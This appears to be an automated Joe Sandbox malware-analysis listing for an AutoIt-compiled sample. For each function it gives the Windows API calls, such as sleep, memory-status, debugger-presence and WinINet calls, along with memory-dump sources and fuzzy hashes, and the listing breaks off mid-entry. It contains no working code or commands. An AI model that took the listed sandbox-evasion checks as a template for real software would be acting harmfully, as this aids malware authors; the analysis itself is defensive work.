                Function 0012F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNEL32(00000000), ref: 0012F2A2
                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0012F2BB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: GlobalMemorySleepStatus
                • String ID: @
                • API String ID: 2783356886-2766056989
                • Opcode ID: 49b083894e039ee4c1a822e2628b48da0221220c7b3a3d87bc5e6897818efa23
                • Instruction ID: 7a430a06cbfaf95a9e9449f1e3465367583cbf11b503473b16c947fd31df6e35
                • Opcode Fuzzy Hash: 49b083894e039ee4c1a822e2628b48da0221220c7b3a3d87bc5e6897818efa23
                • Instruction Fuzzy Hash: D0514771408745ABD320AF14DC86BAFBBF8FF95300F81886DF1D941195EB3185A9CB66
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00195745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                Download Yara Rule
                APIs
                • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 001957E0
                • _wcslen.LIBCMT ref: 001957EC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: BuffCharUpper_wcslen
                • String ID: CALLARGARRAY
                • API String ID: 157775604-1150593374
                • Opcode ID: 2164c23bb2bbe4fee4dc6edeafe734e2fe6498ad0eb28b6996bab7d9396e051d
                • Instruction ID: 3f2baef85d2e2137b409ed1366d28166e189ddb56bf9f8717b93c95a6d90faaa
                • Opcode Fuzzy Hash: 2164c23bb2bbe4fee4dc6edeafe734e2fe6498ad0eb28b6996bab7d9396e051d
                • Instruction Fuzzy Hash: 01418E71A002099FCF15DFA9D8859EEBBF6FF69324F108069E505B7291E7309D81CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                Download Yara Rule
                APIs
                • _wcslen.LIBCMT ref: 0018D130
                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0018D13A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CrackInternet_wcslen
                • String ID: |
                • API String ID: 596671847-2343686810
                • Opcode ID: 7a213a75694daf718b9035d2f9b34f2369918947a0e4b6b91b69904ab1b8997c
                • Instruction ID: b564197b585e8c6427def5ccd2d3dd5cd37bab7ae98cceb81f14b97ddd5d7558
                • Opcode Fuzzy Hash: 7a213a75694daf718b9035d2f9b34f2369918947a0e4b6b91b69904ab1b8997c
                • Instruction Fuzzy Hash: 1F313D71D01209ABCF15EFA4DC85AEE7FB9FF18310F000169F815A6165EB31AA56CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                Download Yara Rule
                APIs
                • DestroyWindow.USER32(?,?,?,?), ref: 001A3621
                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001A365C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$DestroyMove
                • String ID: static
                • API String ID: 2139405536-2160076837
                • Opcode ID: f92532f9489360fc455e8507416beeeaeab64a648c939752bd5170918dd75808
                • Instruction ID: 70390b1209a1119224a58b77a9e73e49c109b0cda5935ea5d1abcf389dc80ba8
                • Opcode Fuzzy Hash: f92532f9489360fc455e8507416beeeaeab64a648c939752bd5170918dd75808
                • Instruction Fuzzy Hash: 90318B75500204AEDB149F68DC80FFB73A9FF99760F008619F8A997280DB31ED91DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00001132,00000000,?), ref: 001A461F
                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001A4634
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: '
                • API String ID: 3850602802-1997036262
                • Opcode ID: 4bdb222a4ead78e4d1382e7f66641105f834fa2b8b295df1fac67fd7681edb04
                • Instruction ID: bbde123afdd711ae0205bbfb515e3a3cc6e1743f1be6ad113838eb469440c09a
                • Opcode Fuzzy Hash: 4bdb222a4ead78e4d1382e7f66641105f834fa2b8b295df1fac67fd7681edb04
                • Instruction Fuzzy Hash: 1231F978E013099FDB14CFA9C991BDA7BB5FF8A304F154069E905AB351D7B0A941CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00113923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                Download Yara Rule
                APIs
                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001533A2
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00113A04
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: IconLoadNotifyShell_String_wcslen
                • String ID: Line:
                • API String ID: 2289894680-1585850449
                • Opcode ID: bff7a94ab6f31ab88a6afac94ae37c09d603ab4b1d8946c744dca38bc5410d1b
                • Instruction ID: 2eb0148cf9b69efa3abd140599ee3962fb8597af74191815f2bfca2fa8455109
                • Opcode Fuzzy Hash: bff7a94ab6f31ab88a6afac94ae37c09d603ab4b1d8946c744dca38bc5410d1b
                • Instruction Fuzzy Hash: F131D071408344AAC329EB60DC45BEFB7E8BF54724F00493AF5A997591EB709AC9C7C2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001A327C
                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001A3287
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: Combobox
                • API String ID: 3850602802-2096851135
                • Opcode ID: 3e71b7bf9f3debafef39bd787c3d883f5a1cbf98f8245ff98c4c5e20be4caa17
                • Instruction ID: 77906ff4ac00fd332f9cfe78caa21ac57ef5c71d071a9c96d8016f33ad0e8c1c
                • Opcode Fuzzy Hash: 3e71b7bf9f3debafef39bd787c3d883f5a1cbf98f8245ff98c4c5e20be4caa17
                • Instruction Fuzzy Hash: 5E11B2753002087FEF259E94DC81FFB3B6AEB9A3A4F104126F928D7290D7319D5197A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0011600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0011604C
                  • Part of subcall function 0011600E: GetStockObject.GDI32(00000011), ref: 00116060
                  • Part of subcall function 0011600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0011606A
                • GetWindowRect.USER32(00000000,?), ref: 001A377A
                • GetSysColor.USER32(00000012), ref: 001A3794
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$ColorCreateMessageObjectRectSendStock
                • String ID: static
                • API String ID: 1983116058-2160076837
                • Opcode ID: feea7e7c352defbc84a705fb7aec39c2221c9ef86db2d660f62dc22073657385
                • Instruction ID: 61c4390836b1df46d337fb4b0096517b6f8e9f8c28785e3bf28fe09e2861da19
                • Opcode Fuzzy Hash: feea7e7c352defbc84a705fb7aec39c2221c9ef86db2d660f62dc22073657385
                • Instruction Fuzzy Hash: 81113AB6610209AFDF01DFA8CC45EFA7BF8FB09354F004524F966E2250E735E8519BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                Download Yara Rule
                APIs
                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0018CD7D
                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0018CDA6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Internet$OpenOption
                • String ID: <local>
                • API String ID: 942729171-4266983199
                • Opcode ID: 8537bfac21956f0809ea156be7821eaaf5591a809ce0d0a2aaa0c5eee2e95f14
                • Instruction ID: f296bbec70a074a209dac9f1615e9585daa8c1648db80d9d9fc828d21edfb46b
                • Opcode Fuzzy Hash: 8537bfac21956f0809ea156be7821eaaf5591a809ce0d0a2aaa0c5eee2e95f14
                • Instruction Fuzzy Hash: AF118271205635BAD7387BA68C49EE7BEADEF127A4F00432AB50993180D7749A41DBF0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                Download Yara Rule
                APIs
                • GetWindowTextLengthW.USER32(00000000), ref: 001A34AB
                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001A34BA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LengthMessageSendTextWindow
                • String ID: edit
                • API String ID: 2978978980-2167791130
                • Opcode ID: 6ece7c08f48855b9bfe9013180d4fe0d01295f02364d15340010d5d8a3cad8f9
                • Instruction ID: a6a5aeeb75bd5786b384d6f893b9fa7c03227797f6bb5b45b0393d35202388d7
                • Opcode Fuzzy Hash: 6ece7c08f48855b9bfe9013180d4fe0d01295f02364d15340010d5d8a3cad8f9
                • Instruction Fuzzy Hash: 32118C79500208AFEB128E64DC84BEB3B6AEB1A378F504324F975971E0C771DC919BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00176C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • CharUpperBuffW.USER32(?,?,?), ref: 00176CB6
                • _wcslen.LIBCMT ref: 00176CC2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$BuffCharUpper
                • String ID: STOP
                • API String ID: 1256254125-2411985666
                • Opcode ID: 01145d6b4e5662a1809e4aa72e2c8e3be5bb8d9f5a23eb7314b262b9f8aa3edf
                • Instruction ID: 093ac48a4cf663c83998c5ce0de9ed025e3fc925ae8ef91aea868dcdf8feee27
                • Opcode Fuzzy Hash: 01145d6b4e5662a1809e4aa72e2c8e3be5bb8d9f5a23eb7314b262b9f8aa3edf
                • Instruction Fuzzy Hash: A80104326109268BCB219FFDDC809BF37B5EB65750B114534E8A696190EB31D940C650
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 00173CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00173CCA
                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00171D4C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                • Opcode ID: 11a33af43c31f401c2ff8620b23321b5f50925fc9fe2bd3e3d1cd3c87c5b9b0f
                • Instruction ID: 53cf723232dc2faf7d09aaa88dbfefff0c0a858df2b6aed7b4dc6fd57c187cb1
                • Opcode Fuzzy Hash: 11a33af43c31f401c2ff8620b23321b5f50925fc9fe2bd3e3d1cd3c87c5b9b0f
                • Instruction Fuzzy Hash: 3E01D871601218BBCB18EBE8CC55DFE7379EB56390B04491AF876573C1EB3059489AA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 00173CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00173CCA
                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00171C46
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                • Opcode ID: 3a11fee8900f16cc47ba540b4fc3a735a57f10c637c8f75ca12dec5e75aab884
                • Instruction ID: 87fa7eabd0ac1b94365fab95b975137d69baaa820d388654b37e18b7a4e420e7
                • Opcode Fuzzy Hash: 3a11fee8900f16cc47ba540b4fc3a735a57f10c637c8f75ca12dec5e75aab884
                • Instruction Fuzzy Hash: 9A01AC7564110876CB09E7D4C952AFF77B99B21340F244026A95A672C1EB209F4896B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 00173CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00173CCA
                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00171CC8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                • Opcode ID: 37cb45e7d7cc62fe11444a77b141aee00e889e2d9a6987b4caada91eebaae02c
                • Instruction ID: 6ae17907cbce7465499e976a6492fe4b904843c21c03848c68a56f5b2f37327e
                • Opcode Fuzzy Hash: 37cb45e7d7cc62fe11444a77b141aee00e889e2d9a6987b4caada91eebaae02c
                • Instruction Fuzzy Hash: 5D01DB7164011877CB09EBD4CA12AFE73B99B21380F544026B85A77281EB209F48D6B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 00173CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00173CCA
                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00171DD3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                • Opcode ID: eeee9ea006af704145467ec3b5087813f5a4144b48a159444bd7198b3014ff4a
                • Instruction ID: 73ca8edff32ae57a2494bcc7f5ebe0acd809b6bbb94cdb26a5ded8613aed3398
                • Opcode Fuzzy Hash: eeee9ea006af704145467ec3b5087813f5a4144b48a159444bd7198b3014ff4a
                • Instruction Fuzzy Hash: E6F0C871B4121876DB1CF7E8CC66FFF7778AB12390F440926B876672C1DB605A4896A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: 3, 3, 16, 1
                • API String ID: 176396367-3042988571
                • Opcode ID: cb90a8daab77d1a67353d9ff6b8c679121804797aee2e5f9d5ef5aff97d7dba3
                • Instruction ID: 45d47f049782603785604f5605f634168f7c6a48c8cda72f43919e3daf7544d5
                • Opcode Fuzzy Hash: cb90a8daab77d1a67353d9ff6b8c679121804797aee2e5f9d5ef5aff97d7dba3
                • Instruction Fuzzy Hash: CDE02B1262422021D7311279ACC1B7F5789DFDD770B14182BF985C32E7EB949D9193A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00170B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                Download Yara Rule
                APIs
                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00170B23
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Message
                • String ID: AutoIt$Error allocating memory.
                • API String ID: 2030045667-4017498283
                • Opcode ID: 9a84cdb4d0c0a49dcf9119efe7f50c48fffcbfcdc5008b5395c6ec76df10fd8d
                • Instruction ID: 3d055ce2e9bacbb4ee08160fb7b2b092254a186ed544fa3859ba3603429ca613
                • Opcode Fuzzy Hash: 9a84cdb4d0c0a49dcf9119efe7f50c48fffcbfcdc5008b5395c6ec76df10fd8d
                • Instruction Fuzzy Hash: 80E0203524432877D21537947C03FC97B948F16F24F10043BF748555C38FE265A046E9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00130D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0012F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00130D71,?,?,?,0011100A), ref: 0012F7CE
                • IsDebuggerPresent.KERNEL32(?,?,?,0011100A), ref: 00130D75
                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0011100A), ref: 00130D84
                Strings
                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00130D7F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
